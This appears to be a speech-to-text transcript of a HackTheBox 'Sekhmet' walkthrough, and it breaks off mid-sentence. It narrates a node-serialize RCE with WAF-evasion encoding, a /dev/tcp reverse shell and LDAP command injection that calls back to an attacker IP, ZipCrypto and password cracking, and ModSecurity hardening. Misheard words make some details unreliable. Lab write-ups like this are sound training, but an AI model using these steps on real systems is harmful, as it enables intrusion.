What's going on YouTube? This is ipsec. We're doing Sekhmet from HackTheBox, which I think may be on the easier end of insane machines. The actual attacks to pull off aren't really that complicated. The hardness is the evasion, the defensive things put into this box. The box itself has two operating systems. It has a Linux host on the DMZ, which you use to get your foothold, and then the Linux server can access the Windows host. The foothold is just a basic node unserialization exploit that could be in an easy machine, but ModSecurity is applied to block all the default payloads, so you have to do a little bit of evasion there. Another piece is once you get RCE on Windows, you want to make it reach back out to you, and you can't steal the NTLM hash easily because NTLM authentication is disabled. And in order for it to authenticate against you, you have to use a host name. So on the Linux box, you have to listen on 445, forward it back to your attack box, and that will allow you to steal the NTLM hash of the user. Once you get on the box, you're in a PowerShell constrained mode with app locker rules, and you have to extract some dpappy secrets. So the easiest way is to copy all the secrets locally and do it locally. But let's just get into the box. As always, we're going to start off with an nmap, so -sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory and call it Sekhmet, and then the IP address of 10.10.11.179. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's a Debian server. We also have HTTP on port 80, it's telling us it is running NGINX, and the title is 403 Forbidden. So there is a little bit of funkiness going on because if you looked at this box on HackTheBox's website, it's listed as Windows, but Nmap is telling us it's Linux. So there's probably some type of virtualization going on. I don't know if it's VMware, VirtualBox, a Docker container, but it appears to be a Linux box based upon Nmap. But if you did something like ping the IP address of 10.10.11.179, you'll see the TTL is 127. The default Windows TTL is 128. It decrements every time it hits a router. So up front, it's Windows, and then all the ports are going to be Linux. If I ping localhost, we see the TTL is 64 because that is the default for Linux-related things. So a little bit of funkiness there. It's not really important. It's just something that you can gather during the recon phase that a lot of people overlook. So let's go take a look at the website. If I went to 10.10.11.179, it directs us to wincorp.htb. So let's go in our host file and add that address. So 10.10.11.179, paste this in, and then let's delete the HTTP. There we go. We can refresh the page, and we get the WinCorp page. A lot of it has lorem ipsum, so there's not much we can really gather from the web page. If we scroll all the way down, there's some usernames, but I don't know where like a login form is, so we don't even have any way to use these. I would probably just take note of them for later, I guess. We got email addresses, a phone number, the info and contact, but not that much there. So I'm going to just try like index.php. We get a not found, index.html, we get this page. We can look at the page source to see if it tells anything about like how it's built, any weird JavaScript files it loads, but really there's nothing too interesting here. So the next step is either to do a Go Buster to find files, or we can do like a virtual host scan to see if there's any other subdomains. I'm going to do a virtual host scan, so I'm going to use ffuf for that. You could also use Go Buster vhost or other things. I don't really have a reason why I'm using ffuf. But we can do ffuf-u http 10.10.11.179-w opt seclist discovery DNS, and then let's see, subdomains, top million, 5,000.txt, and then we got to give it the host header because we want to fuzz for subdomains. I'll do fuzz.windcorp.htb, hit enter. Let's see, we got u, w, h, I need host : like that. There we go. So let's see, what do we want to filter on? I'm going to filter size of 153 because this is just how big the page is. This is the thing that's going to change most likely. Error codes may change, like, I think size is the one that changes the most, right? I'm also going to add -mc all because I just love that with ffuf. And we get portal right off the bat. And it is also a 403 status code. And maybe that's why I started switching over to ffuf instead of using GoBuster or tools like that, just because the workflow of it, you really specify exactly what you want. And I like that. We could try GoBuster to see if it would find it, right? It doesn't take that long. Let's just see. So WinCorp, I'm going to do this. So now we can do GoBuster vhost -u windcorp.htb and then word list. Do we have it in this? I don't. Let's just add it. Opt seclist discovery. It's going to be DNS subdomains 5000. Let's see. Yeah, it finds it. I'm not exactly sure what it used to detect it. Maybe it just detected the size was different and printed it out. But we have it. So that's just why I used ffuf there, because I know exactly the behavior. And with GoBuster, I don't know exactly the behavior. It worked, but since I don't know exactly how GoBuster detects it off the top of my head, that's just why I don't really go with it, right? So let's add portal here and see what is on the page. So we get a portal wincorp.htb and we have a login. I don't see any like forgot password thing. So there's nothing really to try there. If I look at the headers, let's see, let's just log in. Let's do admin password. I'm going to intercept this just so I can easily see the headers that come back. Intercept is on. We can send it, and it has X powered by Express. So I know this is going to be some type of Node.js thing. And looking at this cookie, it's string, and then that doesn't look like base64 to me, but maybe it is. Let's see, echo-n base64d. No, definitely not. So this looks like some weird, just random bits. So I'm guessing that's session is equal to something random. So we don't really have anything there. We could try other passwords. I normally try like admin password, admin, admin everywhere. And admin, admin looks like it is thinking. Let's see. Maybe my intercept is still on. Yeah, wrong credentials. Admin, admin. And we get logged in. And the only thing that happens once we're logged in is it says we've been logged in for X number of seconds. So I don't know exactly how that's being generated. Again, we can go back to Burp Suite, intercept the request, see what it looks like. And we have a new cookie. So we had this one, which we saw before, that's the session. But here is another one. And when I decode it, it is just JSON, right? We have username admin. Admin is equal to 1, so I think this just means I am an admin user. And then we have login time, right? So if I change the login time, click apply, send it. Let's see, how many seconds? I've been logged in for a lot of seconds now that I changed that. But since we know this is Express, it's probably going to be Node.js. And there's a really common library in Node that is vulnerable when serializing to JSON. So let's just see if that library is used. So I'm going to Google Node.js, unserialize, and hack tricks. And then I need to make sure my proxy is off. Go to Google. And we go to this hack tricks page that has deserialization. And I'm just going to search it for Node. So Node dash. And we get to this Node unserialized thing. And I want to say I talked about this more in the ransom video, but it gives us a nice payload right here of what the object should look like. And whenever Node unserializes it, it tries to execute it, right? So let's just test it out. I'm going to paste in the payload here in Burp Suite, and then I just apply changes, and it's going to do that for me. So I'm going to have it sleep for 1 second first. So apply changes again. Shoot, I think I screwed that up. I don't know if it's 4. Does this still decode? Let's see. Decoded from, I don't think so. We had way too many equals. Shoot. There we go. That's fixed. So I can see it's decoded just fine. So we send it, and we get action blocked. And the header is no longer saying it's from Express, so we didn't even make it to the Express server. And if I look here, you have been blocked for security reasons. If you believe this request, please include the request ID number from this page. So the request ID, and it's saying ModSecurity blocked us. So it defines some way around ModSecurity. And the first thing I look at is, well, it's probably not going to be my command because sleep1 is fine. If I was making a signature, I'd probably block like ND function, right? So you can try various ways to encode this. And in JavaScript, it's automatically going to decode hex. So if I do man ASCII, we can look at hex characters. I'm going to, let's use, where's I? We can use I, for example. So I is hex 49. So if I go into my terminal of JavaScript, and I say console.log, can I make this bigger? I can, sweet. ipsec, it prints that, right? But we can also put hex here. So we said that was 49, and it still prints the same thing. So we can probably change the n to something else. So where is n? N is going to be Fort E. So in the print request, I'm going to do \x Fort E, apply changes, send it, action blocked. We can also do a small trick and convert it to Unicode. So if we just do \u, then 004D, let's see what that looks like, or Fort E, I should say. So if I do, I don't know if it's Unicode. I'm guessing it is. We said Fort E. We see that's N, right? So let's try that real quick. So that is encoded, apply change, send. We still get action blocked. I'm going to do the same thing to D. So let's go back to man ASCII. Let's say this is 44. So I'm going to change this, \u 0044. I think I can change like an F or something here as well. Let's just change that. F is going to be 66. Because it may have like function and then open and close parameters. ModSecurity is working based upon dirty word filter or bad word filter, right? So I'm thinking function with opening parenthesis, maybe a bad word. And here we get a immediate result back. It hasn't done the log yet, but it didn't sleep for 1 second, which is a bit odd. We can just try sending like, we can ping ourselves, right? Let's see, ping in Linux. Ping -C1 127.0.0.1. Is it just one? Yep. -C1 10.10.14.8. Sudo TCP dump -I ton 0 ICMP -N to disable DNS. Apply change. Send. We don't get a ping back. So maybe we have something screwed up in our payload. Let's see. We can probably just echo this, right, in our browser and make sure that still says ND. So console log, like this. Let's see. Oh, we have 2 double quotes. Send. So it still says ND func, which is what we want. Don't know exactly why we did not get a ping here, though. Let's see. Let's just try going for the Hail Mary, right? \c, \i, dev TCP 10.10.14.8. I'm going to do, we can try 9001, I guess. You're at and 1. I was thinking maybe there's a firewall in play. And if there was, I'd probably want to limit it to 443 because that's a common port to be allowed out, or like port 80. But let's just go for the Hail Mary and try this. So NCLVNP 9001, send the request, internal server error, which is unique. So we screwed something up, probably because it doesn't unserialize, because we did both of these quotes. I used a single quote twice. I wonder if I can just do this. Send, nothing. Let's go back. Function require -i. So you like escape like this. That should be valid. And we're still not getting anything. So I think something's wrong with our serialization payload, because sleep didn't work, ping didn't work, and a reverse shell is not working. So before we move on to something else, let's just go back to the blog post that we saw this on and make sure we're not missing anything, right? And if you keep reading, it talks about the code actually not executing right away unless you do one other thing. And you have to scroll to the right to see you want to add these parentheses. And I think those were missing on this, right? This is just the serialized object. This just says execute right away. So let us put that there. So if we do open and close parentheses, apply changes, send it, we get a shell. And I don't think sleep and anything else would work, because technically our shell is hung here. It just backgrounded the process. So sleep wouldn't work, but a ping definitely would have. What's going on? This is it from the future. And before we continue, I just want to give a quick ModSecurity 101, because if I was doing testing on this box, I definitely recommend some changes to ModSecurity to make sure this unicode bypass does not work. And if you look at the latest version of the core rule set, which is used by ModSecurity, you'll see it's also, this is patched. So I'm guessing they used old rule files here. So it's a really cool finding. It's not just about the attacking, it's also about making sure the defenses put in place are good. So we could verify that ModSecurity is enabled by just looking at etc nginx modules enabled, and then you get the modsecurity.conf loading the nginx module. Before we go into the actual detection, I want to point out that whenever I do testing against a web server, I put ModSecurity in detection only mode. Additionally, if you're just setting up ModSecurity for the first time, highly, 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 highly recommend putting ModSecurity in detection mode. So you don't really block any thing, because there are false positives. So you want to run in detection mode probably for a week, make sure there's no detections, and then you can go and turn it into blocking mode. So ModSecurity's configuration is in etc nginx modsec here. If I go to modsecurity.conf, the very first thing is the sec rule engine. And the sec rule engine being on just means it's going to be on and blocked, but you could change this to, let's see, detection only. Hold on, there we go. And this would set it so it won't block anything, but it will write all the logs. And a lot of times when I run ModSecurity, I don't really block things. The main thing I care about is the logs. So if something does happen, I know, right? Blocking is definitely nice, but if you ever block an important request, it's probably going to get ModSecurity turned off, and they won't even want to hear you talk about putting in detection only mode. So definitely something good to point out here. I'm going to reverse this change. We may revisit that at the end of this Beyond Root section, but I'll just leave it like that for now. So let's go to our logs. So if we went to our NGINX logs and look at error log, actually this happened yesterday, so it's probably going to be an error log 1. We can see it blocking a lot of things, right? So I'm going to do less-s. Actually, let's just get the very last line. And we can look at exactly what this is. So we got mod security denied with 403, part of the phase 2. And it matched an operator. So core rule set, it has multiple violations. So it's not always just one thing will block a request. So it has access to the IP address, the body of the request. If you enable it accessing the body, again, do I still have this config in here? The next parameter is allowing mod security access to the body of your web request, so it can scan that. But it's got an anomaly score. So maybe if you come from AWS, that just adds 1 to your anomaly score, so it won't immediately block you. If you're AWS and you do cross-site scripting, maybe now your anomaly score is a 4, right? It does it based upon that. So that's how it works. So you can have these small things that won't immediately get blocked. Like you can allow your website users from Tor able to access your website. And if a Tor user sends your website anything remotely that looks like an SQL injection, like they send a single apostrophe, you could have the web server block them if you want. So you can have it based upon multiple parameters. Hopefully that makes sense. But let's keep going on. We can see the exact rule that's blocked. So request 949 blocking evaluation line 80. It's also going to tell us the unique ID right here. And this is used for getting access to the debug logs. So there are mod security debug logs as well. So if we go to Etsy, I think it's just actually in var log, there's a modsecurity.log or a modsecaudit.log. And it looks really confusing. These, I forget exactly what it is, different parts of the phase or things like that. It is useful to know. If you look at the mod security handbook, I'm sure you'll be able to figure that out. But for a quick thing, you can just grab the unique ID. And this is 99% time all you need to do, right? Go to the ID, go to modsec, and you can see everything related to that identifier or that log. And we can see it matched on our ND function thing, right? And now here it's talking about the phase 5. But this is showing exactly what it matched against. We did unicode to take out the ND and the F, right? So that is the string. Let us go to the file. Let's see, where is it? We just want to do the tail command. NGINX tail. I'm going to grab this file. It's at line 80, I think. Is this it? I don't know if this one, I guess this is the anomaly. There's got to be an ND, right? Let's see. Curse of the demo gods. Let's do that grep again. So match this. Does this give me a file that's in? Okay. It's actually request 934 application attack node.js. Oddly specific. Well, not oddly, but it is very specific. Let's see. I did not copy the whole thing. Node.js. File. I don't want to do my less wrapping. That's becoming a pain. This is what I want. So copy this, V, and we can look at the rule. Let's see if I search like this. And here's the actual rule. It's relatively complicated. The key thing I want to point out is, well, this is the rule. It's like looking in cookies. If cookie does not equal UTM, this is like a user tracking cookie, looking in different parameters, and then a bunch of regex to detect it. We have it in phase 2. If it detects it, block. And then we got these transforms being applied. So it's doing a decode uni, which you may think that decode uni would flag this. But decode uni is flagging Windows Unicode, which begins with a %, not a \u. If we go to the mod security handbook, so let's go mod security. I think it's the core rule set handbook, actually. No, mod security handbook, probably. Let's see. It's one of them. Spider Labs, ModSecurity. So ModSecurity is the firewall, and then core rule set is normally the rules you apply to it. So let's see. Where's the wiki? Wiki. Here we go. Let's go to the reference manual. And I'm just going to search for \u. And we can see there is a JSDECODE transform. And this is exactly what we want to do because it detects \u and then this, right? So this is going to detect, or before it searches the regex, it's going to transform it to remove these things. So let's change this. So let's see. I want to say I can just do here maybe. We can do T, then JSDECODE. I hate VI and not Vim. There we go. I think that did it, right? Let me look here, make sure casing. That looks good. So if I send this request, I haven't reverted anything, so I'm not blocked. So let's save, service, NGINX, restart. I think that's going to also restart ModSecurity for me. And I am not blocked. Why did we not get blocked? JSDECODE. So we added that transform. I wonder if we need the transform after base64. Let's see, T, JSDECODE, comma. Restart. There we go. So we needed the transform to be after base64. So it goes no transform, then decode unicode, then do base64 decode, and then JSDECODE. So now it's blocked. We could go to the core rule set GitHub and see what this rule actually looks like on live. So GitHub core rule set, let's pull it. And then let's see, it's going to be in the rules directory. It was like Node.js. Node? What is this file? NGINX 934. Attack generic. Are we in? We're in dev. I wonder if they moved what the name is. Let's see. I'm just going to search ND like this. Core rule set not found. Huh. I think it's probably still in generic. So if I look at ND, there we go. So this is the rule. If we scroll down, we can see maybe the rule would actually not prevent it because it's doing none, decode uni, then JSDECODE, remove white space, and then base64 decode. I wonder if this is an issue. Let's see, T. Okay, let's see what happens. Right, restart. We're not blocked. So I bet we probably should have that base64 after this, because you wouldn't really have any detections based upon the basics, like the exploit in base64 format. So if we put a T base64 decode like this, restart, now we're blocked. So out of curiosity, I want to see if I can put two base64 decodes. This is probably a really stupid thing to do. It's just me experimenting and learning. So yeah, we will still do that. Okay. Yeah, I don't really have that much more. So yep, I verified that we're not blocking everything. So I guess 1 more minute. Let's just put in detect only, and then I'll show you it generating logs while still allowing us. And then we'll call that the end of this beyond root. So v etc NGINX ModSecurity, ModSecurity. Let's change these directives so we're in detection only. Restart NGINX. And then I'm going to truncate error log or cd NGINX. If I cat error log, it's got data because we've been playing with it. So I can truncate -size 0 error log, and then let's tail-f error log. And I'm going to send this request, and since we're in detection only, it's not going to block us. But when we go to our error log, it doesn't show. I guess because it did not block us. If we go to a ModSecurity log, it should show here. Truncate -s0 modsec-f. And I guess this is the benefit of doing these things, because I assumed it would show my NGINX error log. But it just shows in the ModSecurity one. I guess because NGINX didn't generate an error, right? That makes sense to me. So that's going to be the video. Well, not video, the end of the Beyond Root. Let's get back into the box. Let's do Python. Actually, we're Webster. We're not www data. So I'm going to do lsla real quick. Let's see, we're in /root. If I go to /home, am I an actual user on this box? I am. So instead of doing the reverse shell trick, I'm just going to get a SSH session. So I always like getting a legitimate session when I can, right? So SSH key gen, I'll call it just Sekhmet. Generate it, cat sekhmet.pub, and we can just copy this to the authorized key file and log in. So echo, paste, authorized keys, chmod 600, authorized keys, and let's try SSHing to the box. So SSH, before that is Sekhmet 600, chmod 600. I think SSH keygen does this for you, but whenever using an SSH key, good habit to do that, right? Webster at 10.10.11. What is the IP? 170 something. It is 192.168. That's not it. Cat etc host 179. And let's see if we get in, which we do. So we have a shell on the box as Webster. If we do a ls, we don't have any user key, but we do have a backup.zip. There's also a .forever directory, which I don't know what that is. It's got a lot of logs. Let's see, 0e go. Looks like this is some Node.js error message. Honestly, no idea what it is. But the zip is interesting. If I do a file against it, we can see it's just a regular zip. So let us copy it. So I'm going to do a scp-i Sekhmet for a key, Webster at 10.10.11.179, and then backup.zip. And this will copy it to our box. And then I'm going to make dir, I'll call it zip, I guess. And we can unzip backup.zip. And it wants a password. So we can't just unzip it right away. And I always like using 7-zip because it has a, if we just do 7zip-l, right, we can see all the files in this. So we have varlib SSS. And if you're an old Linux admin, SSS is like a winbind. It's a way to do Linux authentication on Windows. So like this directory is super interesting to us. So we definitely want to grab it because this looks like it's domain joined. We also have etc passwd, which is going to be key. So let us do a -SLT on this. And that's going to give us information about every file and exactly how it's encrypted, right? So we see it's using ZipCrypto to encrypt, which is going to be vulnerable to a known plaintext attack. I covered it in the ransom video. It's a box I had made, so you could just go to ipsec.rocks and then type like ransom bkcrack if you want me to explain it again. I probably explain it better in this video, but we're just going to run through it. It's a pretty common attack against zips. I remember like that's how like the Conti ransomware source code was leaked or something. It was like in an encrypted zip, but they used ZipCrypto, and it was easily reversed because of a known plaintext, right? I think it was like actually the ransomware note, which was used as the known plaintext, which is kind of funny because that doesn't change. But let's just copy a link to bkcrack. So copy link. And then we'll do it in a different folder. We'll just wget here. Let's see, tar xvf bkcrack, go in this, and I'm going to move the backup.zip into this. So what we need to do is build a file that's a known plaintext, right? If I go back to my 7-zip command, look for passwd, let's go to this one. We have this file. The main thing I want is the CRC number because this is going to tell us if it's the same or not. So we can see D00 is etc passwd in this zip. So I'm going to go scp another file. So we'd go back to the scp, and I'm going to take etc passwd because we have a copy, right? We have to change where a key is because we went up a directory. So now we have a copy of passwd. I'm just going to use zip to zip it up. So I can zip passwd.zip passwd. And now when I do the 7-zip command against passwd zip, we see the CRC is the same. So D00 EEE, we can do a search up, and we see that's the same in backup. The location's slightly different. We see one's etc passwd, the other is just passwd, but that piece doesn't matter, right? So I'm going to do bkcrack and then -C and specify the zip we want to crack, lowercase c, the file we want to crack, so etc passwd, and then an uppercase P, this is going to be the plaintext zip, which is going to be passwd.zip, and then lowercase p for the file in that zip, which is just passwd. So it's going to run through this crack. It's doing the plaintext attack. You can see it's relatively fast, and this is going in my VM. So once this is done, it's going to output a key, which we'll be able to use to remove the password off the zip, unzip it, and be happy, right? So here's the key. Now we just do bkcrack again. So bkcrack, -C, the zip we want, -K for the key, paste it in, -U for the file name we want to call it. I'm going to do unlock.zip, and the password we put on top of it. So I'm going to do please sub. So it wrote the unlocked archive. I'm going to move unlock.zip into our old zip folder, just so I don't pollute that directory. And then 7zx to extract it. And then please sub is now the password. Did I type that wrong? Always, please. I am typing that wrong. Let me just copy and paste. Copy. There we go. Let's see. Always, paste. There we go. No error messages. So if I go in etc, we can see passwd here. We can read it. So all is happy here. We have completed this plaintext attack. So we can look at the configuration of SSSD and see what it is. We got the domain wincorp.htb, the shell, the home user, Active Directory. Nothing too interesting there. Let's do a file on var, and we'll say type F. So we just list files. We have LDB, which I think is a database. I wonder if I do a file against it, if it'll tell me. Let's just do this. File TDB database. This behaves very much like Redis, which is a caching thing. Funnily enough, strings is the best way I find to get information out of these files that you want. So let's do find-type f-exec strings. I think that'll do it. So we extracted strings from every file, right? And we have a Ray Duncan here. We also have domain as 192.168.0.2. So I'm going to guess that's going to be the DC's IP. If we go through all the strings, this is probably going to be the SID to maybe, I don't know exactly what the SID is to. Having a lot of Active Directory information here. Keep scrolling. Ray Duncan. Let's see. Case insensitive. There are definitely a lot of strings when you do it this way. May want to look at each file individually. Let's see. Yeah, there's a lot of strings. So let us look at the command. And I forgot to filter on the extension. So we can do name star dot, I think it was ldb. Okay. And then we could just search around for things. So I could like grep-i password, and we see there is a cache password. So if I did a -a for 3, so this is going to grep for everything that contains password and 3 lines afterwards, right? And we can see this cache password right here. And this is probably going to be Ray Duncan's cache password because this is a ticket for him. I think he's the one that joined this to the domain. We could just less this real quick. And if we search this, I think it was 6. Let's see whose name is around it. So we can see the kerberos file, Ray Duncan at WindCorp. So I'm guessing Ray Duncan at WindCorp has this password. And he's the one that joined this Linux machine to the domain. So let's go to the Kraken and try cracking this password. So I'm going to go in hashcat v hashes. I'm going to call it ray.duncan. Paste this. And then /hashcat that. And then the word list. Let's just do rocku.txt. And see how long this takes to crack. And almost instantly, we have a result. I'm just going to do --show. And we see Ray Duncan's password is Pantera. So if we do, let's see, since this is joined to the domain, we saw, let's see, if I do ss, does it tell me anything? Oh, shoot, that was a reverse shell. There we go. SSLNTP. No, I bet a ps-ef forest. Let's see. We can see SSSD is running. We got the WindCorp domain. I bet if we went into like the PAM plugins, we would also see that this service is part of like a authentication service because PAM is like the pluggable authentication module. So let us go etc pam.d. Let's just look at common auth. That sounds like a good one to look at. Let's see. Do we have SS? PAM KRB5 and SSS. So we do have Kerberos login here. So long way of saying, I'm going to do a kinit and then ray.duncan. And I'm going to authenticate as him. So Pantera. And now we have his Kerberos ticket, right? And if he is an administrator on this box, we'll be able to use KSU, which is like a Kerberos super user. KSU, maybe I don't do a dash. Yeah. So with SU, I'm used to doing SU dash to like reload my profile. I guess KSU doesn't do it. And we can see Ray Duncan was able to run SU. So he is a root user. So now I have rooted this box, but we're still kind of confused at what we do. We did get the user.txt, but we have to figure out how to get to the Windows server. We know its IP was 192.168.0.2 because we just saw that in the, I want to say like the WinBind, like the SSSD config, right? So let's try like SMB client, and we don't have it. I wanted to list all the shares that are available on the DC. I guess the last thing I want to do before we tunnel back to a box is when I did the KSU command, I forgot to say how that works is there's a .k5 login file, and you just put whatever users can SU to that box. So since Ray Duncan was on the K5 login of root, that's why we could SSH to him. But let us tunnel to a box so we can now run an SMB client. So I'm going to hit squiggly C -D 1080. If the very first thing you type on a line is this, it will drop you into that SSH prompt. So you can see I'm typing it there. I'm going to hit the same keys, just the first line, right? So now I have a tunnel set up, so I can do a proxy chains kinit ray.duncan, and we're going to put the password of Pantera, and we get a session, right? So if I klist, I can see I have a ticket. So the next thing I want to do is an SMB client. So SMB client, or is proxy chains killing it? It is. Okay. I was like, I have it on this box. So proxy chains SMB client -L to list shares -K. And then I'm going to give it the name of hope.wincorp.htb because I think that is the name of the box. Let's see. Etsy, cat Etsy kerb5.conf. Let's see. The admin server is hope.wincorp.com. I think that's a mistake. The KDC is hope.wincorp.htb. But I should add both of these to my host file. So sudo vi etsy host. And we want to add 192.168.0.2. I'm going to add both .htb and .com. Okay. So now when I do this proxy chains, we need slashes, not enough slash. I guess it wants backslashes. There we go. NT status not found. Ping hope.wincorp.htb. That exists. And the proxy chain should be going through this SSH thing. Oh, the other thing we need to do is mirror the kerb5.conf. And you see wincorp.htb here because the last video I did, I think, was Hathor, which also used that domain. So we can just put hope as the KDC here. And then the proxy chains. Let's see. Is it -K? Let's see, -K before the -L. Okay, that was it. I needed the K before the L. And it looks like we can't get to 192.168.0.2 port 445. So let's do some quick troubleshooting. netcat-zv 445. It is open. And we'll do sudo nc-zv 445. Oh, proxy chains. And it's not. So something is wrong with our tunnel. Sudo v etsy proxychains.conf sox5 1080. That should be right. Proxy DNS is not configured. Let's see. Proxy chains 4 doesn't work. Proxy chains 3 also doesn't work. Huh. Let's see. So let's do, let's see, is iptables something blocking us? User sbin iptables. So anything where the earner UID does not match root is dropped. And I wonder if that's going to be me. If I do UID or ID, I am root here, but I wonder if the session is started weirdly because it started with me SSHing as a different user and doing KSU. So that's what I'm going to check real quick. Let's see. Let's just copy, what was the username? Webster.ssh, authorized key, root, SSH, authorized keys. And we can do chmod 600 on that and chown root on the same thing. And we also get a connect timed out when I'm trying to do this. So something's definitely going on with the tunnel. Because we see the connect timed out, we know it got to this box. So there's the second one. Let's just exit. And now we can SSH. This time I'm going to do root. And once we get on, we will see if we encounter the same issue. And I don't know why it's taking its time. Maybe I should do like a -v. I'm guessing it's probably waiting for some kerberos thing that just took forever. Let's see. Squiggly -d 1080 forwarded the port, and it's open. So that is it. We had to make sure we were root before we ran that tunnel command, because I'm guessing it was creating the tunnel as the Webster user. And again, this output rule was blocking us. The source any to 192.168.0 if UID is not 0 drop. So that's probably what happened. So let's go back to our SMB client command. And we get everything. Awesome. So there is a WC share. This is the one I'm going to go through first because, well, it is, what is it? Non-standard, right? So WC share. And we can do a dir. There's a directory called temp. I think -a is show everything. dir/a maybe. Maybe there's no all. Let's just go into temp. And there's a file called debug users. So what I was doing before, I was trying to figure out how to do show hidden files, but I'm drawing a blank on how. Thankfully, I don't think we have to, right? So there is debug users. I just downloaded that file. So let's cat debug users, and we have username and then some digits. And we have no idea any context of that file. We can see the time is today, so March 29th. So we know this file is probably getting updated. That was like a minute ago. I know the times don't exactly match up, but time zones and stuff. Actually, I think my time is the same. 12 plus 6 would be 18. So yeah, our time zones are even set the same. But let us check out another share. So we probably don't have access to admin or C, right? So we could try those shares, but chances are we don't, because if we did, we'd be able just to run like ps exec and this box is done, but the box isn't done yet. The other share, let's try net logon. That's generally where like startup scripts are. So if we go to net logon, we have a few files. There's update phone.link, form.ps1, and WinCorp logo. So let's get form.ps1. Get update phone.lnk. Let's see, put that in quotes. And let's do a strings against the link file. And we can see it's executing PowerShell. It's probably doing something else. There's hope. Let's see. If I do encoding Does this change anything? So that's probably the default. L is another one we can do. So it's running PowerShell, hidden, bypass, and it's executing form.ps1. We could do capital L, see if it prints any better, but this is what that shortcut is doing. So it's executing form.ps1. So let's take a look at it. It looks like it's going to be some type of GUI. Right now we're doing an LDAP query. And then we see form.text, SMS password setup. We got some GUI things to draw some buttons on the screen or the window. To be able to reset password using SMS, you need to keep it updated. And it's doing a user get mobile. So there's a mobile field, I guess, for the users. We can kind of verify that, or we can verify it. So let's do proxy chains, LDAP search, or do I have it? Yeah, proxy chains killed my tab autocomplete. It's LDAP search. Then dash capital H, LDAP, wincorp.hdb, and then dash B, and we do the DC is equal to wincorp, DC equals HTTP. This is just standard LDAP search syntax. If you search ipsec.rocks, you'll find plenty of videos of me talking about it, but you do like a naming context before and you can get the domain. But in this case, we already know the domain is wincorp.hdb, so that's how you put it in LDAP format. We probably need a dash K for kerberos now that I think about it. Let's see. Let's just run. Wait. Why is it going to 10, 10, 11, 179? If I specify hope.wincorp.htb, there we go. It wants to enter password. Let's see. Why did that fail? LDAP search -H grep -I KER. Let's do standard error to null out. And kerberos is not here. Let's see. What if I do it on this box if we have the same thing? So let's kinit Robert dot, was it Robert Duncan? Let's see, cat.k5 login, Ray Duncan. So kinit Ray Duncan, and the password of Pantera is LDAP search going to behave the same way if we don't go through the proxy? That is the question. It does not. So that's weird. Sudo v etc host. Let's try wincorp.htb. I wonder if it's like a DNS thing. The problem's always DNS, right? Is it still going to error? It does. I'm honestly not sure why I'm getting different results when I proxy chains LDAP or run it from this box. Let's see. Does this tell me what type of auth it used? WinCorp. Let's see, is there a verbose? If I do -V, does that work? Maybe. I don't see that. Let's see. Let's try -H for help and see if there's a verbose. So we did -V, and that didn't give us anything. Is there like a -VV? Search up for LDAP search. Did that really fill our pane? Less? Maybe it did, but I'm not seeing anything there. Let's just do 2 and 1. In case sometimes when you do verbose information, the verbosity goes into standard error, not standard out. So that's what I'm doing there. And here we go. we have GSS-SP-NEGO. So that is the auth it is trying to use. Let us do the same exact thing. So -VV, 2 and 1, less. And it's using Sassel Digest. So Erbox probably just doesn't have this plugin, right? Let's see. Check if, or let's do ldap search, use this. There's probably like -Y or something. Yeah, so if we do ldap search -Y and this, let's see. Quit -Y unknown authentication method. So we're just missing this package. I'm not sure exactly what installs it. GSS API, Linux, Debian, or we'll do Ubuntu because those packages are normally the same. And Ubuntu has more users. So we probably need to install. Is there a package this? App search, GSS API. Let's see, installed. Maybe our ldap search just isn't compiled with it, but I'm not going to go into debugging that. We have it working on this box, so that's how we'll do it, right? Okay, so we wanted to look at the mobile number for users, right? And we can see mobile is here. So we want to do a modify of this number. And the easiest way to do that is just through a ldap modify command. So let us get back here. I'm going to go to dev shm now, and we're going to call this duncan.ldif. LDIF's probably a bad one. I'll call it. I think that's the wrong thing to name it, but we'll keep it. Because what is a name or extension? If we call it an exe by any other name, would it still execute? Right? So our ldap syntax begins with dn, and this is going to be the dn of the user we want to modify. I don't know off the top of my head, so we'll leave that blank for now. But we do a change type to tell the ldap command we want to modify. And then we replace the mobile attribute, and then we can say what we want mobile to be. So we're going to call this please subscribe. So now what we have to do is go back to our ldap search command. And we will search for Duncan, get to him, and get his distinguished name. So I can copy this, and then we paste it here. And then we can do a ldap modify -h. I think it's just -h, same thing as ldap search. So wincorp.htb and -f, the file we want, and we do Duncan, and we can see it is modifying him. So if we go back to this ldap search and search again for Duncan, we can see his mobile number is please subscribe. So what we're going to do now is wait a minute, and then we'll see if the file changes that's on the share. If we did SMB client, net logon, and then we can do cd temp, or it wasn't net logon, it was it wc-share? Is that the name of it? cd temp, dir, we can see 1922. If I do a date, I don't think that was a minute ago. We can get debug users real quick. Let's see, cat debug users. Ray Duncan is still that number, but we're going to give it a minute and see if this changes away from 1922. Looks like I was doing a dir as it changed, as it was empty, and now it's here, 1924. So didn't even need to pause the video. Just happened, luckily. So we can get it, and then we cat it, and we get please subscribe. So let us modify this real quick. And this step I really don't like, but there's a blind command injection. If we just do this, and then who am I? And we're going to wait a minute or two and see what happens now to the phone number. Okay, so let's do another dir. And we see it was 24, and now it's 28. It was a little bit longer, but we can get it. And if we cat debug users now, it still says, please subscribe. Let's delete that real quick. Get. See, I think I forgot to do, I think I edited this and forgot the ldap modify. Modify. So now we will wait. And it's actually, I think, every 2 minutes this script runs, not 1 minute. So if I do a date, it is 29:23. So I'm guessing in a minute we'll have an update. It'll probably be around 30:30 for this to be updated. So 28:26 definitely did my ldap modify. So let's just wait the rest of the 30 seconds. Okay, the sleep has finished. If I do a dir, we see 19:30, so I can get debug users.txt. And if I cat this now, we have it running as corp/script runner. So we have just blind command execution in this ldap. So what I'm going to do now is try to make it make a request to my server. So we could just do a, let's do curl 10.10.14.8 port, we'll do 9001. And then we need to modify it. And what I'm actually going to do is we'll do 2 and 1. Whenever you're running any type of PowerShell and you have some type of command execution in like RCE, always recommends piping standard error to standard out, because anytime something fails, that's going to come in super duper handy. So let's now modify that again. And let's see, what time is it? It was 30:26, 31:55. So in about 30 seconds, we need sudo nclvnp 80. Did not want to forget that, right? 9001. So we make sure we're listening. Still 30:26, so it has not ran yet. Let's see, 32. It should be running. 30:26. Did it just remove itself? 32. There we go. So get debug users.txt. And now if I cat debug users.txt, it went back to his phone number. I wonder if that was like a healing script. ldap search. Duncan. Mobile. Definitely not what we set. So that's annoying. Let's do this modify again. Duncan. I need to do search. Duncan. Now it is piped to curl. If we do a dir, it is 32:26, 33. So let's sleep for 70 seconds and see if it reaches back to us. And I got a call back. I was 